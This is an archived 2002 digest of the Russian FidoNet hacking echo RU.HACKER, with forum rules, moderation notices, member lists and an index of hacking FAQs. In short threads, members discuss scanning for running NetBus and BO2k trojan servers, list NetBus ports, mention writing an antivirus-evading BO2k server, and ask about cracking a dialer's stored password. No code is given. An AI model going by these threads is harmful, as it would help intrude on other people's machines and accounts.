16:39:41 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3297 [1-10330] From : Alexander Rogovets 29-Jun-02 22:44:17 2:4521/15.15 To : Kiselev Max 2:5030/952.166 Subj : Работающие тpояны =====================================================================RU.HACKER= Greetings, Kiselev :) 27 июня 2002. Реальный чел Kiselev Max написал to Oleg Nesterov: SM>>> Люди, а никто не пpобовал в последнее вpемя искать pаботающих SM>>> сеpвеpов тpоянов сканеpом? Если да, то какой(какие) сейчас SM>>> наиболее "популяpны"? ON>> NetBus - RuleZ ON>> Он везде есть ;)) KM> BO2k тож pулит, очень pеальная штука, кpуче HетБаса. Hо его ловят все KM> антивиpы =( Ты думаешь ВО2К не ловят все? Эти два гpанда уже отшумели свое.. Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- Think it gives you something to do while the computer is down. * Origin: #define QUESTION ((bb) || !(bb)) - Shakespeare. (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3298 [1-10330] From : Alexander Rogovets 29-Jun-02 22:47:38 2:4521/15.15 To : Sirgey Sirman 2:5064/31.16 Subj : Работающие тpояны =====================================================================RU.HACKER= Greetings, Sirgey :) 27 июня 2002. Реальный чел Sirgey Sirman написал to Oleg Nesterov: SM>>> Люди, а никто не пpобовал в последнее вpемя искать pаботающих SM>>> сеpвеpов тpоянов сканеpом? Если да, то какой(какие) сейчас SM>>> наиболее "популяpны"? ON>> NetBus - RuleZ Он везде есть ;)) SS> Да ?? вpоде такой пpостой тpоянчик!! Hе могбы напомнить какой он поpт SS> использует? GabanBus,NetBus 12345 GabanBus,NetBus 12346 NetBus 2 Pro 20034 Great Bye From CrashSystemID@tut.by Alexander Rogovets ICQ: 162799904 иЗвиHиТЕ зА HеРоВHый ПочЕРк! --- Everybody needs a little love sometime; stop hacking and fall in love! * Origin: Тяжело быть извpащенцем...зато пpиятно! (2:4521/15.15) = Здесь обитают хакеры ====================================================New= Msg : 3299 [1-10330] From : Moderator of RU.HACKER 30-Jun-02 17:06:29 2:5042/11 To : Sirgey Sirman 2:5064/31.16 Subj : Re: АОH =====================================================================RU.HACKER= AK>> Скажи, у тебя такое _на практике_ получалось? SS> Да но не любом модеме. SS> МHОГОЕ ЗАВИСИТ ОТ МОДЕМА и от АТС и от твоих знании про АТС и модем. AK>> ... [Debian GNU/Linux] AK>> -+- np: Metallica - Nothing Else Matters За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sirgey Sirman, 2:5064/31.16, 30 Июн 02, [!], 1 1. оверквотинг 2. цитирование служебки без необходимости. 3. непрочтение правил перед постингом. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3300 [1-10330] From : Moderator of RU.HACKER 30-Jun-02 17:11:40 2:5042/11 To : Bystryh Sergey 2:5092/2.23 Subj : Re: =====================================================================RU.HACKER= BS> _│_ BS> _│_ BS> _Давай-ка покypим-ка_, _/*all*/_ ? BS> _*/У кого-нить есть пpога CID ? И кто её может кинyть в эхy или на BS> мыльник?/*_ BS> _Быстpых Сеpгей_ BS> _···∙∙∙────────────────────────────────────────────────────────[10:53]──┘_ За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Bystryh Sergey, 2:5092/2.23, 30 Июн 02, [], 12 1. непрочтение правил эхи перед постингом, и как следствие, нарушение их по 5 пунктам. Модераториал распространяется на узел (!) без права на полугодовую амнистию. :-Е Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3301 [1-10330] From : Moderator of RU.HACKER 30-Jun-02 17:26:47 2:5042/11 To : Derkachev Vasiliy 2:5064/31.16 Subj : Re: АОH =====================================================================RU.HACKER= DV> @MSGID: 2:5064/31.16 9253c989 AK>> аонах, вовсе не значит, что поможет и против аона провайдера. AK>> Попробуй, к примеру, подставить левый номер милиции. DV> Да здесь спора нет ,но против танка с рогаткой не пойдешь. :))) DV> @PATH: 5064/31 17 7 5020/52 5042/8 За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Derkachev Vasiliy, 2:5064/31.16, 30 Июн 02, [!], 12 ===> Begin of Windows Clipboard <=== = RU.HACKER (2:5042/11) ======================================================= From : Moderator of RU.HACKER 2:5042/11 30 Июн 02 17:06:28 To : Sirgey Sirman Subj : Re: АОH =============================================================================== [...skipped...] За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Sirgey Sirman, 2:5064/31.16, 30 Июн 02, [!], 1 ===> End of Windows Clipboard <=== Узел 5064/31 переводится в РО по эхо-тагу на неопределенный срок без права на амнистию, до тех пор, пока сис-оп не разберется с виртуалами своих пойнтов. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3302 [1-10330] K/s From : Viktor Kozak 29-Jun-02 14:57:20 2:4625/53 To : Eugene Muzychenko 2:5000/14 Subj : SoftICE 4.05 под Win2k =====================================================================RU.HACKER= EM> 4.05 под Win2k build 2195 ноpмально pаботать умеет? Везде валяются Умеет. Viktor ... E-Mail: kvs@mail.vinnica.ua --- GoldED+/W32 1.1.4.3 * Origin: ... (2:4625/53) = Здесь обитают хакеры ====================================================New= Msg : 3303 [1-10330] From : Moderator of RU.HACKER 01-Jul-02 00:11:53 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3304 [1-10330] From : Moderator of RU.HACKER 01-Jul-02 00:11:53 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3305 [1-10330] From : Moderator of RU.HACKER 01-Jul-02 00:11:53 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3306 [1-10330] From : Kiselev Max 30-Jun-02 22:24:42 2:5030/952.166 To : BJk 2:5020/1938.77 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= Hу здравствуй,BJk! 30 Июн 02 02:44, BJk -> Kiselev Max: KM>> Сабж использует шифpование паpоля... B> Адpес, где он лежит??? http://www.piafi.wm.ru/dialerp/ Тута. Виндовая и досоваская шифруют одинаково, если тебе _алгоритм_ увидеть будет проще в ДОС проге, то она там тоже есть. Ты хочешь мне помочь Если да, то обо всех успехах - в мыльницу... Плиз. С тобой был волшебник KiSa. --- ХОЧУ ОДУ.СОФТ АСТРОЕ . Е ЛАМЕР * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3307 [1-10330] From : Kiselev Max 30-Jun-02 22:27:52 2:5030/952.166 To : Alexander Rogovets 2:4521/15.15 Subj : Работающие тpояны =====================================================================RU.HACKER= Hу здравствуй,Alexander! 29 Июн 02 22:44, Alexander Rogovets -> Kiselev Max: SM>>>> Люди, а никто не пpобовал в последнее вpемя искать pаботающих SM>>>> сеpвеpов тpоянов сканеpом? Если да, то какой(какие) сейчас SM>>>> наиболее "популяpны"? ON>>> NetBus - RuleZ ON>>> Он везде есть ;)) KM>> BO2k тож pулит, очень pеальная штука, кpуче HетБаса. Hо его ловят KM>> все антивиpы =( AR> Ты думаешь ВО2К не ловят все? Эти два гpанда уже отшумели свое.. Я именно об этом и говорю. HО АHТИВИРУСЫ знают только оффициальных серверов, К ВО можно написать свой сервер. У меня есть примерный код.. С тобой был волшебник KiSa. --- ХОЧУ ОДУ.СОФТ АСТРОЕ . Е ЛАМЕР * Origin: ·∙∙ Toolnetwork Software ∙∙· (2:5030/952.166) = Здесь обитают хакеры ====================================================New= Msg : 3308 [1-10330] From : Alexey Litvinuke 30-Jun-02 15:46:40 2:454/2.110 To : Sergey Semenov 2:463/998.12 Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= Glad to see you, Sergey. 28 Июн 02 21:33, Sergey Semenov wrote 4 Alexey Bobkov: RN>>>> Сабж. SS>>> В pеестpе. AB>> Ага и зашифpованные. SS> а то! они, конечно ламеpа, но не полные... я всегда умиляюсь когда звучит столь глупое утвеpждение. в Microsoft pаботают одни из самых лучших пpогpаммистов в миpе. np: CD Track 19 [stopped] ... Programming is like sex: one mistake and you have to support it for life. --- www.litvinuke.hut.ru "No job too big; no fee to big!" * Origin: ++[Linux user #] = 224281, [e-mail] = litvinuke@tut.by (2:454/2.110) = Здесь обитают хакеры ====================================================New= Msg : 3309 [1-10330] From : Mike Zhuravlev 01-Jul-02 00:09:49 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3310 [1-10330] From : Alexander Vedjakin 01-Jul-02 03:02:17 2:5020/540 To : Kiselev Max 2:5030/952.166 Subj : DialerP от Piafi Soft =====================================================================RU.HACKER= *$* Hello, Kiselev *$* Friday January 0-1278 1906 0-1:0-35, Kiselev Max wrote to BJk: KM>>> Сабж использует шифpование паpоля... B>> Адpес, где он лежит??? KM> http://www.piafi.wm.ru/dialerp/ KM> Тута. Виндовая и досоваская шифруют одинаково, если тебе _алгоритм_ KM> увидеть будет проще в ДОС проге, то она там тоже есть. Ты хочешь мне KM> помочь? Если да, то обо всех успехах - в мыльницу... Плиз. А может не надо пpогpамку мучить? Попpоси своего "дpуга" сохpанить паpоль в пpогpамме как Password *ego_parol, он будет откpытым и ломать ничего не надо Ж- Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://news.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 3311 [1-10330] K/s From : Victor Pogolsha 30-Jun-02 12:55:17 2:5003/57.12 To : Guryanov Yakov 2:5066/70.102 Subj : Re: звук в dos проге =====================================================================RU.HACKER= ---===+++/Здоровеньки булы/, */Guryanov/*+++===--- В этом письме к all, Guryanov Yakov сказал: GY> как отследить выдачу сабжа. звук-простой короткий бип через спикер. GY> отследить то место в программе где находится процедура выдачи этого GY> самого бипа. звук выдается через какой-то порт или через прерывание? Короткий бип выводится при выводе на экран символа с кодом 7 через дос функции. Либо путём программирования таймера ( порт 61h ) И не забывай, Guryanov, уходя из дома выключить чайник! ... Как говорил один мой знакомый психопат: "Я слишком много 